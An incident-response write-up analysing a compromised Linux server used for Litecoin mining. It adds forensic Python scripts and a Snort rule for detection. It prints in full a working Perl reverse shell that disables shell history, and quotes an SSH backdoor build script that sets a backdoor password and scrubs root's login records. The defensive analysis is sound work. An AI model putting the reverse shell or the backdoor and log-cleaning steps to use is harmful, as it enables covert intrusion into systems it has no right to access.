The case of Minerd
I recently ran across an interesting compromised system. While the initial vulnerability was nothing special (compromised credentials), what the system was being used for and one of the attacker's persistence techniques were a lot less common than I normally see. The system had three different backdoors and was being used to mine virtual currency.
When responding to the system, I quickly noticed an unknown process running. Additionally, the binary the process had been started from had been deleted from disk, and another file associated with the process had been deleted as well (see below). This is a common technique for attackers on Linux: the file is marked deleted on the file system, but the kernel keeps the inode alive for as long as the process holds it open, so the binary can still be pulled back out through /proc/<pid>/exe until the process exits. Grab it before you kill anything.
Minerd
--------------
PS Results
1 S www-data 13335 1 99 80 0 - 13941 - Nov10 ? 12-01:46:12 ./minerd -o stratum+tcp://mine.pool-x.eu:9000 -u <user> -p <pw> --algo scrypt --no-longpoll -B
LSOF Results
minerd 13335 www-data txt REG 8,1 379680 385036 /tmp/minerd (deleted)
minerd 13335 www-data 4u IPv4 14473113 TCP d.local:41591->mine.pool-x.eu:9000 (ESTABLISHED)
--------------
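The recovery step described above, as an added example rather than anything from the original diary: walk /proc, list every process whose executable has been unlinked (the "(deleted)" entry lsof shows for minerd), and copy the still-open binary out for hashing. The evidence directory and the EVIDENCE_DIR variable are assumptions for this example.

```python
import hashlib
import os
import shutil

# Added example, not code from the original diary: find processes whose executable
# has been unlinked from disk and recover the binary while the process still holds
# it open. Linux exposes the executable as the /proc/<pid>/exe symlink; the kernel
# appends " (deleted)" to its target once the path is gone, but the inode lives on
# until the last reference closes.

DELETED_SUFFIX = " (deleted)"


def find_deleted_exes(proc="/proc"):
    """Return [(pid, original_path)] for every process whose exe was unlinked."""
    hits = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            target = os.readlink(os.path.join(proc, entry, "exe"))
        except OSError:
            # kernel threads have no exe; other users' processes need root
            continue
        if target.endswith(DELETED_SUFFIX):
            hits.append((int(entry), target[: -len(DELETED_SUFFIX)]))
    return hits


def sha256_file(path):
    """SHA-256 of a file, read in chunks so a large binary is not loaded at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def recover_exe(pid, dest, proc="/proc"):
    """Copy the still-open executable of <pid> to dest and return its SHA-256.

    Opening /proc/<pid>/exe follows the link to the live inode, so this works
    even though the original path no longer exists on the file system.
    """
    src = os.path.join(proc, str(pid), "exe")
    with open(src, "rb") as fin, open(dest, "wb") as fout:
        shutil.copyfileobj(fin, fout)
    return sha256_file(dest)


if __name__ == "__main__":
    # EVIDENCE_DIR is an assumption for this example; use a volume you control.
    evidence_dir = os.environ.get("EVIDENCE_DIR", ".")
    for pid, path in find_deleted_exes():
        dest = os.path.join(evidence_dir, "pid%d_%s" % (pid, os.path.basename(path)))
        print("%d %s -> %s sha256=%s" % (pid, path, dest, recover_exe(pid, dest)))
```

Run it as the same user that owns the suspect process (or as root) before the process is stopped; once minerd exits, the inode is freed and the only copy is gone.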
Minerd is a CPU miner, used here for Litecoin (think of it as a cheaper version of Bitcoin; its scrypt proof-of-work was, at the time, still practical to mine on ordinary server CPUs). As virtual currency values continue to increase, I expect to see a lot more of these attacks on servers: mining pays better than using the system for spam or as a basic bot.
The software speaks the Stratum mining protocol. Below is a sample of the traffic from the mining pool (178.33.111.19), a mining.notify job push to the miner:
--------------
{"params": ["ee9", "f2d2b32c8c45a965c0459d7ce169b9cbb71d741d2a77574577f6658dfa677e0a", "01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2103830207062f503253482f0410bf835208", "072f506f6f6c582f0000000001e08e472a010000001976a9146effd3bfcee317f978ea0927efd99f5d7992dacd88ac00000000", ["28eab10f99561dbabf1555ea7f36358e4752a7dc1a69ad980e50156e89e00320", "963c9c57be6a0b60f421861cbfc8ca6aa75e5ca0ad43b9276a46a871223d381a", "ad83aa11bab14d23472518b9c0d5bc59ab869b45f022a8e176a50c58af70abb4"], "00000002", "1b340532", "5283bf10", false], "id": null, "method": "mining.notify"}
--------------
I was able to find a write-up on the protocol at mining(dot)bitcoin(dot)cz/stratum-mining.
I did not find a Snort rule for this kind of traffic. The rule below watches any port, as I was not able to verify that the port should be 9000; it seems to depend on the mining pool the attacker is using. It keys on the start of the pool-to-miner job push shown above, so it depends on that exact JSON serialization (a space after the colon, "params" as the first key); expect to tune it against what your pool and miner actually send, and expect some false positives from other JSON-RPC traffic that happens to begin the same way.
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Possible Bitcoin/LiteCoin Mining"; flow:established; content:"|7B 22 70 61 72 61 6D 73 22 3A 20 5B 22|"; depth:15; classtype:bad-unknown; reference:url,mining.bitcoin.cz/stratum-mining; sid:1000500; rev:1;)
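To see what the rule above does and does not catch, here is an added example (not from the original diary) that classifies Stratum JSON-RPC lines by method and direction, applies the same 13-byte content match within the same 15-byte depth, and pulls the job fields out of a mining.notify. The NOTIFY message is the capture shown above; the subscribe, submit and false-positive messages are constructed for this example, as is the compact re-serialization of the notify.

```python
import json
from datetime import datetime, timezone

# Added example, not from the original diary. Stratum is newline-delimited
# JSON-RPC over TCP: the pool pushes work to the miner (mining.notify,
# mining.set_difficulty) and the miner answers with mining.subscribe,
# mining.authorize and mining.submit.

POOL_TO_MINER = {"mining.notify", "mining.set_difficulty"}
MINER_TO_POOL = {"mining.subscribe", "mining.authorize", "mining.submit"}

# The rule's content: option, |7B 22 70 61 72 61 6D 73 22 3A 20 5B 22|, decoded,
# and its depth (the match must fall inside the first 15 bytes of the payload).
RULE_CONTENT = b'{"params": ["'
RULE_DEPTH = 15


def classify(line):
    """Return (method, direction) for one Stratum line, or None if it is not one."""
    try:
        msg = json.loads(line)
    except ValueError:
        return None
    if not isinstance(msg, dict) or not isinstance(msg.get("params"), list):
        return None
    method = msg.get("method")
    if method in POOL_TO_MINER:
        return method, "pool->miner"
    if method in MINER_TO_POOL:
        return method, "miner->pool"
    return None


def rule_matches(line):
    """Mimic the Snort rule: content must occur within the first RULE_DEPTH bytes."""
    return RULE_CONTENT in line[:RULE_DEPTH]


def notify_fields(line):
    """Pull the job fields out of a mining.notify for the incident notes."""
    msg = json.loads(line)
    if msg.get("method") != "mining.notify":
        raise ValueError("not a mining.notify message")
    job_id, prevhash, coinb1, coinb2, merkle, version, nbits, ntime, clean = msg["params"]
    ts = int(ntime, 16)  # ntime is a big-endian hex Unix timestamp
    return {
        "job_id": job_id,
        "prevhash": prevhash,
        "merkle_branches": len(merkle),
        "ntime": ts,
        "ntime_utc": datetime.fromtimestamp(ts, tz=timezone.utc).isoformat(),
        "clean_jobs": clean,
    }


# The job push captured from the pool (taken from the diary's sample above).
NOTIFY = (
    b'{"params": ["ee9", "f2d2b32c8c45a965c0459d7ce169b9cbb71d741d2a77574577f6658dfa677e0a", '
    b'"01000000010000000000000000000000000000000000000000000000000000000000000000'
    b'ffffffff2103830207062f503253482f0410bf835208", '
    b'"072f506f6f6c582f0000000001e08e472a010000001976a9146effd3bfcee317f978ea0927efd99f5d7992dacd88ac00000000", '
    b'["28eab10f99561dbabf1555ea7f36358e4752a7dc1a69ad980e50156e89e00320", '
    b'"963c9c57be6a0b60f421861cbfc8ca6aa75e5ca0ad43b9276a46a871223d381a", '
    b'"ad83aa11bab14d23472518b9c0d5bc59ab869b45f022a8e176a50c58af70abb4"], '
    b'"00000002", "1b340532", "5283bf10", false], "id": null, "method": "mining.notify"}'
)
# Constructed samples for this example (not captured traffic):
COMPACT_NOTIFY = json.dumps(json.loads(NOTIFY), separators=(",", ":")).encode()
SUBSCRIBE = b'{"id": 1, "method": "mining.subscribe", "params": []}'
SUBMIT = b'{"method": "mining.submit", "params": ["<user>", "ee9", "00000000", "5283bf10", "1a2b3c4d"], "id": 4}'
FALSE_POS = b'{"params": ["hello"], "id": 7, "method": "echo"}'


def audit(lines):
    """For each line: what it is, and whether the Snort rule would have fired."""
    return [(classify(line), rule_matches(line)) for line in lines]


if __name__ == "__main__":
    for line, (kind, fired) in zip([NOTIFY, COMPACT_NOTIFY, SUBSCRIBE, SUBMIT, FALSE_POS],
                                   audit([NOTIFY, COMPACT_NOTIFY, SUBSCRIBE, SUBMIT, FALSE_POS])):
        print("%-40s snort=%s  %s" % (kind, fired, line[:40]))
    print(notify_fields(NOTIFY))
```

The same job serialized without spaces, or any miner-to-pool message that puts "method" before "params", slips past the content match even though it is plainly Stratum; a rule built on the method names (or on the stratum+tcp handshake) would be more robust than one built on the first bytes of a JSON object.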
SSHD Trojaned
The attacker had timestomped all the files in the /usr/sbin directory to hide the file modification (touch can rewrite atime and mtime, but only the kernel sets ctime, so a ctime far newer than the mtime still gives a replaced binary away). We found some interesting strings in the SSH daemon that quickly revealed the backdoor (see below). Trojaned files have been around for a long time, but I do not often run into them on compromised Linux servers. In this case, the attacker was not very stealthy about the modifications to the file.
--------------
Partial Strings from the back door
[1m |Enjoy this private backdoor! |
[2;31m
[1m <----|====O)))==)\) /====
[36m
[1m |We won't do any harm to you;) |
220f5212624556ad12718ecb1c5cdda2
--------------
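The two checks that find a binary like this, as an added example that is not the diary's own code: a ctime-versus-mtime sweep of a directory such as /usr/sbin to surface timestomped files, and a scan for the banner strings shown above. The temporary directory layout and the marker list are assumptions for this example.

```python
import os
import stat

# Added example, not code from the original diary. Timestomping with touch or
# utimes rewrites atime and mtime, but ctime (inode change time) is set only by
# the kernel, so a file whose ctime is well ahead of its mtime was written or
# replaced after its mtime was set. The banner strings from the diary are then a
# cheap confirmation of which file carries the backdoor.

BACKDOOR_MARKERS = [b"Enjoy this private backdoor", b"We won't do any harm to you"]


def timestomp_candidates(directory, min_gap=3600):
    """Return [(name, ctime - mtime in seconds)] for regular files whose ctime
    is more than min_gap seconds newer than their mtime."""
    out = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        try:
            st = os.lstat(path)
        except OSError:
            continue
        if not stat.S_ISREG(st.st_mode):
            continue
        gap = st.st_ctime - st.st_mtime
        if gap > min_gap:
            out.append((name, int(gap)))
    return out


def find_markers(path, markers=BACKDOOR_MARKERS):
    """Return the marker strings present in the file (what grepping strings output would show)."""
    with open(path, "rb") as f:
        data = f.read()
    return [m.decode() for m in markers if m in data]


def triage(directory):
    """Combine both checks: each timestomp candidate with its marker hits."""
    return [(name, gap, find_markers(os.path.join(directory, name)))
            for name, gap in timestomp_candidates(directory)]


if __name__ == "__main__":
    for name, gap, markers in triage("/usr/sbin"):
        print("%-20s ctime is %d s newer than mtime  markers=%s" % (name, gap, markers))
```

A package upgrade also leaves ctime ahead of mtime (dpkg and rpm restore the packaged mtime at install time), so treat the sweep as a shortlist rather than a verdict and confirm with the package manager (`rpm -V openssh-server` or `debsums -c openssh-server`) or against a known-good copy of sshd from another host.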
The initial script for building the backdoor was not recovered on the server. After some quick Googling, I came across this install script for an SSH backdoor (pastebin.com/CDe7epGA). Other parts of the toolkit seemed to match up. This may not be the identical script, but it was close to what was used.
--------------
# pick a random 12-character password for the backdoor
BPASS=`./tools/random.sh 12`
echo -e "${BLUE}# Backdoor Password set to : ${WHITE}${BPASS}${NORMAL}"
# patch the password and the log path into the backdoor header before building
# sshd ('#' is used as the sed delimiter because the path contains slashes)
cat backdoor.h|sed -e s/SSHD_PASS/"$BPASS"/ -e s#LOG_PATH#"$LPATH"# > 1.temp
mv 1.temp backdoor.h
./configure --sysconfdir=/etc/ssh 2> error_log.1
# logcleaner ships with the kit; -u root scrubs root's entries from the login records
./logcleaner -u root
echo -e "${CYAN}# ENJOY THIS PRIVATE BACKDOOR ${NORMAL}"
--------------
IRC BOT
The second backdoor was a typical IRC bot; nothing special here. The install directory was /var/lib/.phpdata/sshd, and the attacker named the script sshd so it would blend in with the legitimate daemon in a process listing. The IRC channel name was #MuieBa.
Perl Backdoor
This is a typical Perl reverse shell: give the script the IP and port you want to "shovel a shell" to. It was located in the /tmp folder and was never used by the attacker. The script keeps the session out of bash_history (it unsets HISTFILE and then points it at /dev/null), prints some system information once it connects, and then hands the connection to /bin/bash. Its MD5 is 48d4d5a3dee9ef43e5b1387356d2f7ff and the filename is back.txt.
--------------
cat back.txt
#!/usr/bin/perl
use IO::Socket;
$system = '/bin/bash';
$ARGC=@ARGV;
print "--== ==-- \n\n";
# expects exactly two arguments: the listener's host and port
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
# outbound TCP connection to the attacker's listener
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Spawning Shell \n";
SOCKET->autoflush();
# dup the socket over stdin/stdout/stderr: everything the shell reads and writes
# now crosses the network connection (this is what /proc/<pid>/fd shows later)
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== Thuraya Team ==-- \n\n";
# disable history for the session, then dump some host details to the attacker
system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
# finally hand the connection to an interactive bash
system($system);
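The one thing a shell like this cannot hide is where its standard descriptors point. Below is an added example, not part of the diary, that finds processes whose stdin, stdout and stderr all resolve to the same socket in /proc/<pid>/fd, then looks the socket inode up in /proc/net/tcp to recover the remote end (the same information lsof reported for minerd). The little-endian decoding of /proc/net/tcp addresses is assumed, as it holds on x86 and ARM hosts.

```python
import os
import re
import socket

# Added example, not code from the original diary. The Perl backdoor above dup()s
# its TCP socket onto STDIN, STDOUT and STDERR, so in /proc/<pid>/fd the entries
# 0, 1 and 2 all read socket:[<inode>] with one and the same inode.

SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")


def stdio_socket_inode(pid, proc="/proc"):
    """Return the socket inode if fds 0, 1 and 2 of pid are the same socket, else None."""
    inodes = set()
    for fd in (0, 1, 2):
        try:
            target = os.readlink(os.path.join(proc, str(pid), "fd", str(fd)))
        except OSError:
            return None  # fd closed, or process not inspectable by this user
        m = SOCKET_LINK.match(target)
        if not m:
            return None
        inodes.add(int(m.group(1)))
    return inodes.pop() if len(inodes) == 1 else None


def _decode_addr(field):
    """Decode an IPv4 'AABBCCDD:PPPP' field from /proc/net/tcp. The address word is
    in host byte order (little-endian assumed here); the port is big-endian hex."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntop(socket.AF_INET, bytes.fromhex(ip_hex)[::-1])
    return ip, int(port_hex, 16)


def peer_for_inode(inode, table="/proc/net/tcp"):
    """Return (remote_ip, remote_port) for a TCP socket inode, or None if not listed."""
    with open(table) as f:
        next(f)  # column header
        for line in f:
            fields = line.split()
            # columns: sl local rem st tx:rx tr:when retrnsmt uid timeout inode ...
            if len(fields) > 9 and fields[9] == str(inode):
                return _decode_addr(fields[2])
    return None


def find_reverse_shells(proc="/proc"):
    """Return [(pid, comm, inode, peer)] for processes whose stdio is one socket."""
    hits = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        inode = stdio_socket_inode(int(entry), proc)
        if inode is None:
            continue
        try:
            with open(os.path.join(proc, entry, "comm")) as f:
                comm = f.read().strip()
        except OSError:
            comm = "?"
        peer = None
        try:
            peer = peer_for_inode(inode)  # None for IPv6 or Unix sockets
        except OSError:
            pass
        hits.append((int(entry), comm, inode, peer))
    return hits


if __name__ == "__main__":
    for pid, comm, inode, peer in find_reverse_shells():
        print(pid, comm, "socket:[%d]" % inode, peer or "(peer not in /proc/net/tcp)")
```

Services started by inetd/xinetd legitimately run with their stdio on the accepted socket, so review each hit by its comm and peer rather than treating the list as a verdict; a bash, sh or perl with a socket on fd 0 and a remote peer you do not recognize is the thing to chase.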
Are you seeing compromised servers being used for mining currency? Let us know!
Tom Webb